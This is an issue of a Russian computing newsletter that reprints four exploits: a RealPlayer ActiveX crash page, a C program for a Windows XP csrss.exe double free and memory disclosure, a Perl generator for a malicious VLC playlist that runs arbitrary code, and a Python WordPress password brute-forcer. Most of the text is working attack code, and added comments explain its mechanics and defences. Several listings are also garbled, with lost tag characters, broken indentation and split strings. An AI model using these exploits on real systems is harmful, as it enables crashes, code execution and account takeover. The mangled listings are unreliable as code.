
Компьютер для продвинутых пользователей. Выпуск по безопасности. Exploits.


Компьютер для продвинутых пользователей
В этом выпуске:
RealPlayer 10.5 | File Upload Manager 1.0.6 | VLCMediaSlayer | Wordpress
ПО: RealPlayer 10.5 Exploit:
<!--
---------------------------------------------------------------------------
RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

lt;html>
lt;object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' 
id='RealPlayer'>lt;/object>lt;script language='vbscript'>
' Denial-of-service trigger for the RealPlayer ierpplug.dll ActiveX control
' described in the header comment above.  As pasted, the opening tags appear
' to have lost their leading "&" ("lt;" instead of "<"), so this copy is not a
' well-formed page.

argCount   = 2

arg1="default"
' Second argument is a 1,000,000-character string; according to the header
' this crashes Internet Explorer 7 on XP SP2 when handed to the control.
arg2=String(1000000, "A")

' Defensive notes: setting the kill bit for the CLSID above (or removing /
' updating the control) prevents IE from instantiating it at all; a page that
' embeds this CLSID is the observable indicator.
RealPlayer.OpenURLInPlayerBrowser arg1 ,arg2

</script>

ПО: Microsoft Windows

Exploit:
/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError
///// Csrss.exe-winsrv.dll Double Free  
/////////////////////////////////////////
///// Ruben Santamarta  
///// ruben at reversemode dot com
///// www.reversemode.com
/////////////////////////////////////////
///// 12.29.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////
////// XP SP2
////////////////////////////////////////


#include <stdio.h>
#include <windows.h>
#include <winbase.h>
#include <ntsecapi.h>

// NOTE(review): UNICODE is defined after the Windows headers above were already
// included, so it does not affect them; the calls below resolve to the ANSI entry points.
#define UNICODE
// Hard-coded XP SP2 address inside winsrv.dll's data section (per the author's note).
// It is both the fill pattern written through MessageBoxA and the starting parameter
// for NtRaiseHardError in main(), so the program is tied to that one Windows build.
#define MAGIC_VALUE 0x75b4cd40  // winsrv.dll data section


// Set to TRUE by main() once stage 1 is done; while FALSE the ReadBox thread
// auto-dismisses every dialog it finds.
BOOL gFon=FALSE;

typedef LONG NTSTATUS;
// Function-pointer type for the undocumented ntdll!NtRaiseHardError, resolved at run
// time with GetProcAddress in main().  Parameter order: ErrorStatus, NumberOfParameters,
// UnicodeStringParameterMask, Parameters, ValidResponseOption, Response.
typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS,
                                    ULONG,
                                    ULONG,
                                    PULONG,
                                    UINT,
                                    PULONG);    

// Csrss.exe memory monitor thread
// (Read csrss.exe memory disclosure exploit for details)

VOID WINAPI ReadBox2( LPVOID param )
{
    /* Monitor thread started by main() for stage 2.  Once a second it looks for a
     * dialog-class ("#32770") window, reads the text of its second static child and
     * its caption, interprets the first four bytes of each as a DWORD, prints a
     * classification of that value and then closes the dialog.  The author's premise
     * (see the file header) is that the hard-error dialog raised by NtRaiseHardError
     * echoes back memory from winsrv.dll's data section inside csrss.exe.
     * The loop never exits; the thread lives until the process terminates.
     * `param` is unused, as are hButton, hChunk, i, b, gTemp and lpBuff. */

    HWND hWindow,hButton,hText;
    DWORD hChunk,cHeader=0;
    int i=0,b=0;
    int gTemp;
    char lpTitle[300];
    char lpText[300];
    char lpBuff[500];
    ZeroMemory((LPVOID)lpTitle,250);
    ZeroMemory((LPVOID)lpText,250);
    ZeroMemory((LPVOID)lpBuff,300);
    Sleep(2000);
    
    for (;;)
    {
    
        // NOTE(review): this stores the truncated address of an empty string literal,
        // not a NUL byte; it is harmless only because the buffer is zeroed again below.
        lpText[0]=(BYTE)"";
        Sleep(1000);
        // Any top-level dialog, regardless of caption.
        hWindow = FindWindow("#32770",NULL);
        ZeroMemory((LPVOID)lpTitle,250);
        ZeroMemory((LPVOID)lpText,250);
        ZeroMemory((LPVOID)lpBuff,300);
        
        if(hWindow != NULL)
        {
            GetWindowText(hWindow,(LPSTR)&lpTitle,250);
            
            // Dialogs captioned "Aa" are skipped; the reason is not visible here.
            if(strcmp(lpTitle,"Aa")!=0)
            {
                hText=FindWindowEx(hWindow,0,"static",0);
                
                // The first read is discarded: lpText is overwritten with the text of
                // the next sibling control two lines down.
                GetWindowText(hText,(LPSTR)&lpText,250);
                hText=GetNextWindow(hText,GW_HWNDNEXT);
                
                GetWindowText(hText,(LPSTR)&lpText,250);
             
                // Reinterpret the first four characters of the control text as a DWORD.
                cHeader=*(DWORD*)lpText;
                if( cHeader!=0)
                {
                      
                      // 0x100000..0x400000 is the author's heuristic for a csrss heap
                      // address on XP SP2; anything else is reported as an overwritten
                      // winsrv.dll data value.
                      if(cHeader >0x100000 && cHeader<0x400000)
                      {     
                            printf("\n**************************\n");
                            printf("Heap Chunk Found! Good Luck!\n");
                            // NOTE(review): %p expects a pointer; passing a DWORD only
                            // works on the 32-bit target this was written for.
                             printf("New Value: 0x%p",cHeader);
                           printf("\n**************************\n");
                            
                      }
                      else
                      {
                          printf("\n****************************\n");
                            printf("winsrv.dll data overwritten! \n");
                            printf("New Value: 0x%p",cHeader);
                            printf("\n****************************\n");
                           
                      }
                }  
                 else
                {
                    printf("\n****************************\n");
                    printf("nothing found! ");
                    printf("\n****************************\n");
                }  
                
                // Same classification, this time on the dialog caption.
                cHeader=*(DWORD*)lpTitle;
                if( cHeader!=0)
                {
                      
                      if(cHeader >0x100000 && cHeader<0x400000)
                      {     
                            printf("\n**************************\n");
                            printf("Heap Chunk Found! Good Luck!\n");
                             printf("New Value: 0x%p",cHeader);
                           printf("\n**************************\n");
                            
                      }
                      else
                      {
                          printf("\n****************************\n");
                            printf("winsrv.dll data overwritten! \n");
                            printf("New Value: 0x%p",cHeader);
                            printf("\n****************************\n");
                           
                      }
                }    
                else
                {
                    printf("\n****************************\n");
                    printf("nothing found! ");
                    printf("\n****************************\n");
                }
                
            }
            
            // Dismiss the dialog so the blocked MessageBoxA / NtRaiseHardError call
            // in main() can return without user interaction.
            SendMessage(hWindow,WM_CLOSE,0,0);
               ZeroMemory((LPVOID)lpTitle,250);
            ZeroMemory((LPVOID)lpText,250);
            ZeroMemory((LPVOID)lpBuff,300);
        }
        // NOTE(review): an HWND is not a kernel handle; CloseHandle on it is incorrect
        // and its return value is ignored.  Window handles need no closing.
        CloseHandle(hWindow);
    }

}

VOID WINAPI ReadBox( LPVOID param )
{
    /* Dialog-dismisser thread started by main() before stage 1.  While the global
     * gFon is FALSE it closes any dialog-class ("#32770") window once a second, so
     * the MessageBoxA calls in main() return without anyone clicking.  After main()
     * sets gFon to TRUE the loop keeps spinning but does nothing; the thread is never
     * terminated explicitly.  `param` is unused. */

    HWND hWindow;
    
    for (;;)
    {
        Sleep(1000);
        if(!gFon)
        {
                 hWindow = FindWindow("#32770",NULL);
        
                 if(hWindow != NULL )
                 {
                  SendMessage(hWindow,WM_CLOSE,0,0);
                  }
        }
    }

}


int main()
{
   /* Entry point.  Flow as written:
    *   1. start ReadBox so message boxes are auto-dismissed;
    *   2. stage 1: show MessageBoxA with MB_SERVICE_NOTIFICATION 2 + 11 times, with
    *      the MAGIC_VALUE byte pattern as text (the author's heap-corruption step);
    *   3. stage 2: start ReadBox2, then call NtRaiseHardError 15 times with args[0]
    *      stepping through winsrv.dll's data section 4 bytes at a time, so the
    *      hard-error dialog text reveals what is stored there.
    * Defensive notes: this targets one specific XP SP2 build (hard-coded address),
    * must run locally, and was addressed by a later vendor security update; a crash
    * of csrss.exe is fatal to the whole system, so the failure mode is a system halt.
    * An unprivileged process issuing MB_SERVICE_NOTIFICATION message boxes followed by
    * repeated NtRaiseHardError calls is the observable pattern. */


   // NOTE(review): Length/MaximumLength are set to 5 bytes although L"fun!" occupies
   // 10 bytes; the string is passed as NtRaiseHardError's third parameter below.
   UNICODE_STRING uStr={5,5,L"fun!"};
   // Parameter array for NtRaiseHardError; args[0] is advanced in the stage-2 loop.
   ULONG retValue,args[]={MAGIC_VALUE,MAGIC_VALUE,(ULONG)&uStr};
   PNTRAISE NtRaiseHardError;
   DWORD dwThreadId;  

   // Despite the name this is data, not code: "\x5C\x3F\x3F\x5C" spells `\??\` and
   // the rest is MAGIC_VALUE (0x75b4cd40) repeated in little-endian byte order.
   byte  *ShellCode ="\x5C\x3F\x3F\x5C\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75";
                     
   int i=0;
   
   // Resolved at run time because NtRaiseHardError is not exported through the
   // import libraries; a NULL result is not checked before the call below.
   NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"),
                                               "NtRaiseHardError");  
    system("cls");
    printf("##########################################\n");
    printf("### Microsoft Windows NtRaiseHardError ###\n");
    printf("### Csrss.exe-winsrv.dll Double-Free   ###\n");
    printf("## Ruben Santamarta www.reversemode.com ##\n");
    printf("##########################################\n");
      printf("## + Csrss.exe Double-Free     Exploit  ##\n");
      printf("## + Csrss.exe Memory Disclosure Exploit##\n");
      printf("##########################################\n");
    printf("# XP SP 2                                #\n");
      printf("##########################################\n\n");
    printf("\nThe exploit overwrites controlled addresses\n");
      printf("in winsrv.dll data section within Csrss.exe\n\n");
       
    // Auto-dismisser for the message boxes shown below (see ReadBox).
    CreateThread( NULL,              
                  0,                  
                 (LPTHREAD_START_ROUTINE)ReadBox,        
                  0,             
                  0,                 
                 &dwThreadId);
   
   // Seeding the heap               
   // MB_SERVICE_NOTIFICATION makes the box be displayed on the user's behalf by the
   // session subsystem; per the header that is how the text reaches csrss/winsrv.dll.
   for(i=0;i<2;i++) 
MessageBoxA(0,"\x40\xcd\xb4\x75","\x40\xcd\xb4\x75", 
MB_SERVICE_NOTIFICATION);
    
   // Exploiting Csrss.exe Double-Free
   
   printf("[*] Stage 1 -= Hitting Heap =-\n\n")    ;         
   printf("[+] Corrupting the heap (11 attemps)\n\n");
    
   for( i=0; i<11; i++)
   {
           
           printf("#%d... ",i+1);
           MessageBoxA(0, ShellCode,"A", MB_SERVICE_NOTIFICATION);
   }
    
    // From here on ReadBox stops closing dialogs; ReadBox2 takes over.
    gFon=TRUE;
 
    printf("\n\n[*] Stage 2 -= Scanning winsrv.dll data section =-\n\n") ;
    Sleep(2000);
    
    CreateThread( NULL,              
                  0,                  
                 (LPTHREAD_START_ROUTINE)ReadBox2,        
                  0,             
                  0,                 
                 NULL);
    
    // Start 0x20 below MAGIC_VALUE; the loop adds 4 before each call, so the 15
    // reads cover MAGIC_VALUE-0x1c .. MAGIC_VALUE+0x1c.
    args[0]-=0x20;     
    
    // Exploiting Csrss.exe memory disclosure flaw
    
    for(i=0;i<0xF;i++)
    {
        args[0]+=4;   
        // NOTE(review): this format string is split across two lines in this copy of
        // the listing and will not compile as pasted.
        printf("\n#%d Reading at : 
[0x%p]\n",i,args[0]);                                      
        // Status 0x50000018 with 3 parameters; mask 4 marks the third (uStr) as a
        // UNICODE_STRING; response option 1.  The return value is ignored.
        NtRaiseHardError(0x50000018,3,4,args,1,&retValue);
    }
   
    printf("\n[+] Exploit exiting\n\n");
    
printf("#############################################################\n");
    printf("If you didn't find anything, run the exploit one more time!\n");
    printf("If you find a heap chunk address, enjoy!\n");
    
printf("#############################################################\n");
 
 
    // No explicit return; both helper threads are still running at exit.
}

ПО: VLCMediaSlayer
Exploit:
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is just a vanilla format string exploit for OSX on ppc. We
# overwrite a saved return addy with our shellcode address.
# This code currently overwrites the saved return addy with the stack
# location of our shellcode.
#
# This exploit will create a malicious .m3u file that will cause VLC
# Player for OSX to execute arbitrary code.
#

# 0xf02031d2:      "--? 0j? 0h%11$hn.%12$hn", 'X' <repeats 177 times>...
# 0xf020329a:      'X' <repeats 200 times>...
# 0xf0203362:      'X' <repeats 200 times>...
# 0xf020342a:      'X' <repeats 200 times>...
# 0xf02034f2:      'X' <repeats 194 times>, "ZY"
# 0xf02035b7:      ""
# 0xf02035b8:      'X' <repeats 16 times>, "? 5?\05\17G?? 60"
# 0xf02035d5:      ""
# 0xf02035d6:      ""
# 0xf02035d7:      "\04\05\16

# Builds the format-string payload.  The playlist entry is a udp:// URL, so the
# "%25" / "%24" pieces are percent-encoded "%" and "$"; once VLC decodes the entry
# it reads "%<width>d%11$hn" followed by "%<width>d%12$hn", i.e. two half-word
# writes through positional arguments 11 and 12 — the two addresses pack()ed at the
# front of the entry below.  All offsets assume the fixed 0xf020xxxx stack layout
# noted in the header (ppc OS X without address randomisation).
$format =
# make it more robust yourself... I'm lazy
# land in 0xf020 3362 - middle of shellcode
# "%2511%24hn.%2512%24hn" .
#
"%25" . (0x3362-0x24) . "d" . "%25" . "11" . "%24" . "hn" .
"%25" . 0xBCBE . "d" . "%25" . "12" . "%24" . "hn" ;

# 0xf020 3068 saved ret for MsgQueue()
$writeaddr = 0xf0203068;

# NOTE(review): the open() result is not checked; a failure is silent.
open(PWNED,">pwnage.m3u");

# One #EXTM3U header line plus one entry: the two target addresses (high half first),
# the format string, then "i" padding sized against VLC's "Can't get file status for "
# error-message prefix so the line length is fixed.  Defensive notes: the root cause is
# an attacker-controlled file name reaching a printf-style formatter; passing such
# strings as arguments (never as the format) and compiler format checks remove the
# bug, and a playlist entry containing %…$hn sequences is a clear detection signal.
print PWNED "#EXTM3U\n" ."udp://--" . pack('l', $writeaddr+2) . 
pack('l', $writeaddr) .
$format ."i" x (999 - length("Can't get file status for ") ) ."\n";

close(PWNED);

ПО: Wordpress

Exploit:
#!usr/bin/python
# Flaw found on Wordpress
# that allows dictionary & brute-force attacks
# Greetz goes to : NeoMorphS, Tiky
# Vendor : http://wordpress.org/
# Found by : Kad (kadfrox@gmail.com / #kadaj-diabolik@hotmail.fr)
import urllib , urllib2, sys, string
# Candidate alphabet for the brute-force mode: ASCII letters, punctuation and digits
# concatenated, then split into a list of single characters (equivalent to list(tab)).
tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
tab = [  i for i in tab ]
def node( table, parent, size ):
    """Recursive candidate walker for the brute-force mode.

    Extends ``parent`` by one character from ``table`` at a time, posts each
    candidate as a login attempt (fields ``log`` = argv[2], ``pwd`` = candidate)
    to the module-level ``server``, and recurses until ``size`` reaches 0.

    NOTE(review): as pasted the body is inconsistently indented (everything after
    the ``string =`` line is pushed further right) and one statement is split
    across lines, so this definition does not parse in this copy.

    Defensive notes: every iteration is one unauthenticated POST for the same
    user name, and a failed attempt is recognised only by the
    "Incorrect password.</div>" marker in the response.  Server-side rate
    limiting, account lockout, CAPTCHA/MFA on the login form and alerting on
    failed-login volume from a single client all defeat this pattern.
    """
    if size == 0:
        pass
    else:
        for c in table:
            string = "%s%s"%( parent, c )
                        data = {'log': sys.argv[2],
                                'pwd': string}
                        print "[+] Testing : "+string
                        request = urllib2.Request(server, 
urllib.urlencode(data))
                        f = urllib2.urlopen(request).read()
                        if not "Incorrect password.</div>" in f: 
print "[!] Password is : "+mot ; break
            node( table, string, size-1 )
 
def bruteforce( table, size ):
    """Drive ``node`` once per starting character of ``table``.

    ``size`` is the total candidate length; ``node`` receives ``size-1`` because
    the first character is already chosen here.  Nothing is returned.
    """
    for c in table:
        node( table, c, size-1 )
        
# Command-line driver.  argv[1] = login URL, argv[2] = user name, argv[3] = mode,
# argv[4] = word-list path (mode 1) or candidate length (mode 2).
# NOTE(review): the usage text below is split across lines in this copy, and the
# two ``if sys.argv[3] == ...`` blocks further down have no indented body, so this
# section does not parse as pasted.
if (len(sys.argv) < 3):
    # NOTE(review): the advertised default of 'admin' is never applied — argv[2]
    # is read unconditionally in both modes.
    print "Usage : float.py <server> <user> <choice> 
<dico-characters>"
    print "\nDefault: User is 'admin'"
    print "Choice : 1} Dictionnary Attack, use dictionnary file"
    print "         2} Bruteforce Attack, use number of character for 
password"
    
else:
    # Module-level name read by node() in the brute-force mode.
    server = sys.argv[1]
    # Mode 1: word list.  The file is read once to count lines (b), rewound, and
    # then read line by line; it is never closed.
    if sys.argv[3] == "1":
    a , b = open(sys.argv[4],'r') , 0
    for lines in a: b = b + 1
    a.seek(0)    
    c = 0
    while (c < b):
        mot = a.readline().rstrip()
        data = {'log': sys.argv[2],
                'pwd': mot}
        print "[+] Testing : "+mot
        request = urllib2.Request(server, urllib.urlencode(data))
        # One POST per word; a failure is detected only by the marker text below,
        # so a lockout page or a rate-limit response is misreported as success.
        f = urllib2.urlopen(request).read()
        if not "Incorrect password.</div>" in f: print "[!] Password 
is : "+mot ; break
        else: c = c + 1 ; pass
    # Mode 2: exhaustive search over `tab` for candidates of length argv[4].
    if sys.argv[3] == "2":
    print "[-] Server is : "+server
    print "[-] User is : "+sys.argv[2]
    print "[-] Number of characters are : "+sys.argv[4]
        number = int(sys.argv[4])
        bruteforce( tab, number )
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
